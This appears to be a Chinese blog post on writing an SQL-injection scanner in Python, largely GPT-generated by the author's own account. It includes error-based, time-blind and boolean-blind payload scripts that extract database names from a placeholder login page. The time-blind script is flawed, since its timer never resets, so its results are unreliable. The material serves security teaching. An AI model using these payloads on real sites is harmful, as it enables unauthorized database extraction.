[安全开发] SQL注入扫描(一股子GPT味~)
实际上大部分都是它写的,它真我哭
SQL注入扫描就是一种用于检测和预防SQL注入攻击的工具。它通过模拟SQL注入攻击的方式,向目标网站发送特定的SQL查询语句,以验证目标网站是否存在SQL注入漏洞。SQL注入扫描的过程通常分为以下几个步骤:
- 收集信息:扫描器会首先向目标网站发送各种类型的请求,例如HTTP GET、POST等,以获取目标网站的响应,进而收集关于目标网站的信息。
- 发现漏洞:扫描器会尝试使用各种常见的SQL注入技巧来探测目标网站是否存在SQL注入漏洞。例如,它会向目标网站发送一些特定的字符,以验证是否存在对输入数据进行检查的措施。
- 验证漏洞:如果扫描器成功地发现了SQL注入漏洞,它会尝试利用该漏洞来验证其有效性。例如,它会发送一些恶意的SQL查询语句,以查看是否能够成功地从目标网站的数据库中提取数据。
- 报告结果:扫描器会将其扫描结果整理成报告,包括发现的漏洞类型、漏洞的位置、漏洞的影响程度等信息。
总的来说,SQL注入扫描可以帮助网站管理员及时检测和预防SQL注入攻击,从而保护网站和数据库的安全。
下面分别描述这四部分
收集信息
为什么我们要收集信息?
比如说我们对于http://www.example.com/网站进行扫描,就要先使用爬虫获取扫描目标,没有扫描目标的话,直接对着http://www.example.com/怼,能够扫出漏洞我愿意称之为天选之子。
假设现在收集到了1000个网址,包含了:
- http://www.example.com/images/1.jpg
- http://www.example.com/images/2.jpg
- http://www.example.com/js/upload.js
- http://www.example.com/admin/login.php
- http://www.example.com/1.html
- http://www.example.com/page/1.php?id=1
- .....
如果你是一个渗透测试工程师,你第一反应是检测哪个网址?
So,这也是我们脚本需要实现的东西
不可能每个网址都扫描一遍吧,恰好我们有100个验证SQL注入的POC,那么就需要发送1000*100个包,这对该网站是一个噩梦,当然也有可能刚开始扫就被防火墙给拦截了,或者很多东西都是错误网址,浪费了扫描器的时间
所以我们需要在收集信息这一步将一些干扰信息排除掉,具体来说,需要分析目标网站的响应数据,包括响应头、响应体、响应码等信息,以获取目标网站的状态和特征等
发现漏洞&验证漏洞
这里其实是POC和EXP的区别,这里我们统一用POC来解释
我们根据SQL注入的不同类型来编写SQL注入的检测脚本,因为这里的分类因人而异,这里只进行前三中的安全开发扫描简述
- 报错注入
- 时间盲注
- 布尔注入
- 宽字节注入
- 联合注入
- 堆叠注入
- 二次注入
- ....
报错注入检测脚本
报错注入是一种常见的SQL注入技术,其基本原理是通过构造恶意的SQL查询语句,使目标网站返回错误信息,从而获得有关目标数据库的敏感信息
它的检测关键点在于回显需要有报错信息,在下面的脚本中报错回显是
"You have an error in your SQL syntax"
使用python编写一个实例脚本
import requests
# 定义目标网站URL和注入参数
target_url = 'http://www.example.com/login.php'
injection_param = 'username'
# 构造注入语句
injection_payload = "' or 1=1 union select 1,2,3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()-- "
# 发送恶意请求
payload = {injection_param: injection_payload}
response = requests.post(target_url, data=payload)
# 分析响应并检测是否存在SQL注入漏洞
if "You have an error in your SQL syntax" in response.text:
print("SQL注入漏洞存在")
else:
print("SQL注入漏洞不存在")
时间盲注检测脚本
时间盲注,最重要的就是时间
import requests
import time
# 定义目标网站URL和注入参数
target_url = 'http://www.example.com/login.php'
injection_param = 'username'
# 构造注入语句
injection_payload = "' or if(substr(database(),{pos},1)='{char}', sleep(5), null)-- "
# 发送恶意请求并计时
start_time = time.time()
for i in range(1, 20): # 假设数据库名称长度不超过20个字符
for j in range(33, 127): # ASCII码表中可见字符的范围
# 替换注入语句中的占位符
payload = {injection_param: injection_payload.format(pos=i, char=chr(j))}
response = requests.post(target_url, data=payload)
# 如果响应时间大于5秒,则表示猜测的字符是正确的
if time.time() - start_time > 5:
print("第{}位字符为:{}".format(i, chr(j)))
break
else:
continue
break
以上脚本中,我们首先定义了目标网站的URL和注入参数,然后构造了一个注入语句,其中使用了时间盲注的技巧,使用sleep函数控制响应时间。接着,我们使用一个双重循环来猜测数据库名称中的每一个字符,如果猜测正确,则响应时间会超过5秒,从而得到正确的字符
布尔注入检测脚本
布尔注入的基本原理是通过构造恶意的SQL查询语句,使目标网站返回不同的响应结果(True或False)
这里的True和False是什么?
水无常形,需要根据情况讨论,如果我们的一个SQL注入脚本,正确的时候,是返回200状态码,失败的时候,返回404状态码,这里的对应
- True 200
- False 404
另一种情况,正确的时候,返回个人信息,失败的时候,返回为空,这里的对应
- True 获得个人信息
- False 空信息
在下面这个脚本中,Login failed为False,登录成功为True ,通过判断响应结果中是否包含“Login failed”来判断猜测是否正确
import requests
# 定义目标网站URL和注入参数
target_url = 'http://www.example.com/login.php'
injection_param = 'username'
# 构造注入语句
injection_payload = "' or ascii(substr(database(),{pos},1))={char}-- "
# 猜测数据库名称的长度
for length in range(1, 20): # 假设数据库名称长度不超过20个字符
# 猜测每一位字符
database_name = ''
for i in range(1, length+1):
for j in range(33, 127): # ASCII码表中可见字符的范围
# 替换注入语句中的占位符
payload = {injection_param: injection_payload.format(pos=i, char=j)}
response = requests.post(target_url, data=payload)
# 判断响应结果是否发生变化
if 'Login failed' in response.text:
break
else:
continue
database_name += chr(j)
break
else:
break
print("数据库名称为:", database_name)
输出报告
这玩意不用我说了吧
浅谈检测的优化
关于漏洞检测的优化,我觉得这东西可以写一本书,这里简单说几个抛砖引玉
在第一步我们获取到扫描目标后,我们需要进行一波过滤,可以定义一个字典 ['js','jpg','png']等等,将对应的静态后缀给过滤掉,不进入到第二步的扫描中,节省扫描时间
在时间盲注中,如果我们用国内的扫描器扫描国外的网站,可能你正常访问国外的网站,等待的时间都需要10秒,检测脚本中等待的5秒都属于正常的网络抖动,误报率会非常高,这种情况下可以先发几个包到需要检测的网站上,计算一个平均访问时间,在平均访问时间上构造盲注时间,这样来提高准确率
OK,SQL注入扫描就到这里啦,自己编写扫描脚本的时候,需要根据扫描结果来不断优化迭代,进而让脚本趋于完善,共勉
END
建了一个微信的安全交流群,欢迎添加我微信备注进群,一起来聊天吹水哇,以及一个会发布安全相关内容的公众号,欢迎关注
| 加我拉你入群 | 黑糖安全公众号 |
|---|---|
![]() |
![]() |
[安全开发] SQL注入扫描(一股子GPT味~)的更多相关文章
- WebGoat学习——SQL注入(SQL Injection)
SQL注入(SQL Injection) 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令.攻击者通过web请求提交带有影响正 ...
- 关于sql注入漏洞的挖掘及渗透工具简介
大量的现代企业采用Web应用程序与其客户无缝地连接到一起,但由于不正确的编码,造成了许多安全问题.Web应用程序中的漏洞可使黑客获取对敏感信息(如个人数据.登录信息等)的直接访问. Web应用程序准许 ...
- 安全攻防之SQL注入(通过sqlmap搞定所有问题)
第一步: sqlmap基于Python,所以首先下载: http://yunpan.cn/QiCBLZtGGTa7U 访问密码 c26e 第二步: 安装Python,将sqlmap解压到Python ...
- 【转】SQL注入(通过sqlmap来改变所有事情)
第一步: sqlmap基于Python2.72版本,所以首先下载: https://www.python.org/ 记住不要下载python3 第二步: 安装Python,将sqlmap解压到Pyt ...
- [SQL注入1]From SQL injection to Shell
第一次写,希望大神们多指点. 对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习.网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTE ...
- SQL注入:sqli-labs lesson-1 小白详解
为什么是小白详解?因为我就是小白 SQL注入早有耳闻,今天算是真正打开这个门了,但是想要跨进去应该还是没有那么容易. 在B站上听了40分钟的网课,老实说,他讲的还不错,第一遍听不懂也正常 https: ...
- SpringBoot微服务电商项目开发实战 --- api接口安全算法、AOP切面及防SQL注入实现
上一篇主要讲了整个项目的子模块及第三方依赖的版本号统一管理维护,数据库对接及缓存(Redis)接入,今天我来说说过滤器配置及拦截设置.接口安全处理.AOP切面实现等.作为电商项目,不仅要求考虑高并发带 ...
- Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过
Kali Linux Web 渗透测试视频教程—第十一课-扫描.sql注入.上传绕过 文/玄魂 原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali- ...
- Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。
Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说... root@xi4ojin:~# cd ...
- PHP如何防止SQL注入及开发安全 53
PHP如何防止SQL注入及开发安全 [php] function inject_check($sql_str) { $check=eregi('select|insert|update|de ...
随机推荐
- 脏牛-Linux内核提权
漏洞范围 下载地址:https://github.com/FireFart/dirtycow 有一点可以在意,dirty.c内置在了kali中,使用命令searchsploit dirty可以搜索 也 ...
- 一文快速回顾 Java 操作数据库的方式-JDBC
前言 数据库的重要性不言而喻,不管是什么系统,什么应用软件,也不管它们是 Windows 上的应用程序,还是 Web 应用程序,存储(持久化)和查询(检索)数据都是核心的功能. 大家学习数据库时,比如 ...
- 如何通过C#/VB.NET从PowerPoint文档中提取图片
PowerPoint是用于制作幻灯片(演示文稿)的应用软件,每张幻灯片中都可以包含文字.图形.图形.表格.声音和影像等多种信息.有时候我们发现在PPT里面有一些精美的图片,或者其他原因想要把PPT里面 ...
- 【NLP 系列】Bert 词向量的空间分布
作者:京东零售 彭馨 1. 背景 我们知道Bert 预训练模型针对分词.ner.文本分类等下游任务取得了很好的效果,但在语义相似度任务上,表现相较于 Word2Vec.Glove 等并没有明显的提升. ...
- 【读书笔记】组合计数中的行列式方法 专题2 欧拉回路,the BEST theorem
目录 专题2-欧拉回路,the BEST theorem 一些定义 一个有向图是欧拉的充要条件 BEST定理 BSET定理推论 k-ary de Bruijn sequence定义 BSET theo ...
- RabbitMQ 消息中间件总结
RabbitMQ 是实现高级消息队列协议(AMQP:Advanced Message Queue Protocol)的开源代理软件,也称为面向消息的中间件.支持多种操作系统.多种编程语言.Rabbit ...
- Android系统服务DropBoxManagerService详解与实践应用
作者:vivo 互联网客户端团队- Ma Lian 借助系统DropBoxManagerService对于系统文件目录dropbox管理的设计,了解其文件管理的规则.运行机制.读写机制.管控机制,根据 ...
- Git链接上游仓库
技术背景 在Git的操作过程中,一般的组织内部工作模式可以在同一个仓库上的master-develop-feature不同分支上进行开发,也有一些人和外部协作者会通过Fork到自己本地的仓库进行更新的 ...
- python模拟鼠标键盘操作
前言 1 懒人,工作中可以模拟真人操作,不用自己点击 2游戏人员 这是做模拟外挂的必备知识,不管手机还是电脑游戏,尤其副本 准备模块 代码如下: 实现了一个最简单的输入密码,enter进入的登录过程 ...
- LeeCode链表问题(二)
LeeCode 19: 删除链表的倒数第n个节点 题目描述: 给你一个链表,删除链表的倒数第 n 个节点,并返回链表的头节点. 标签:链表,双指针 时间复杂度:O(N) 建立模型: 定义虚拟头节点,使 ...

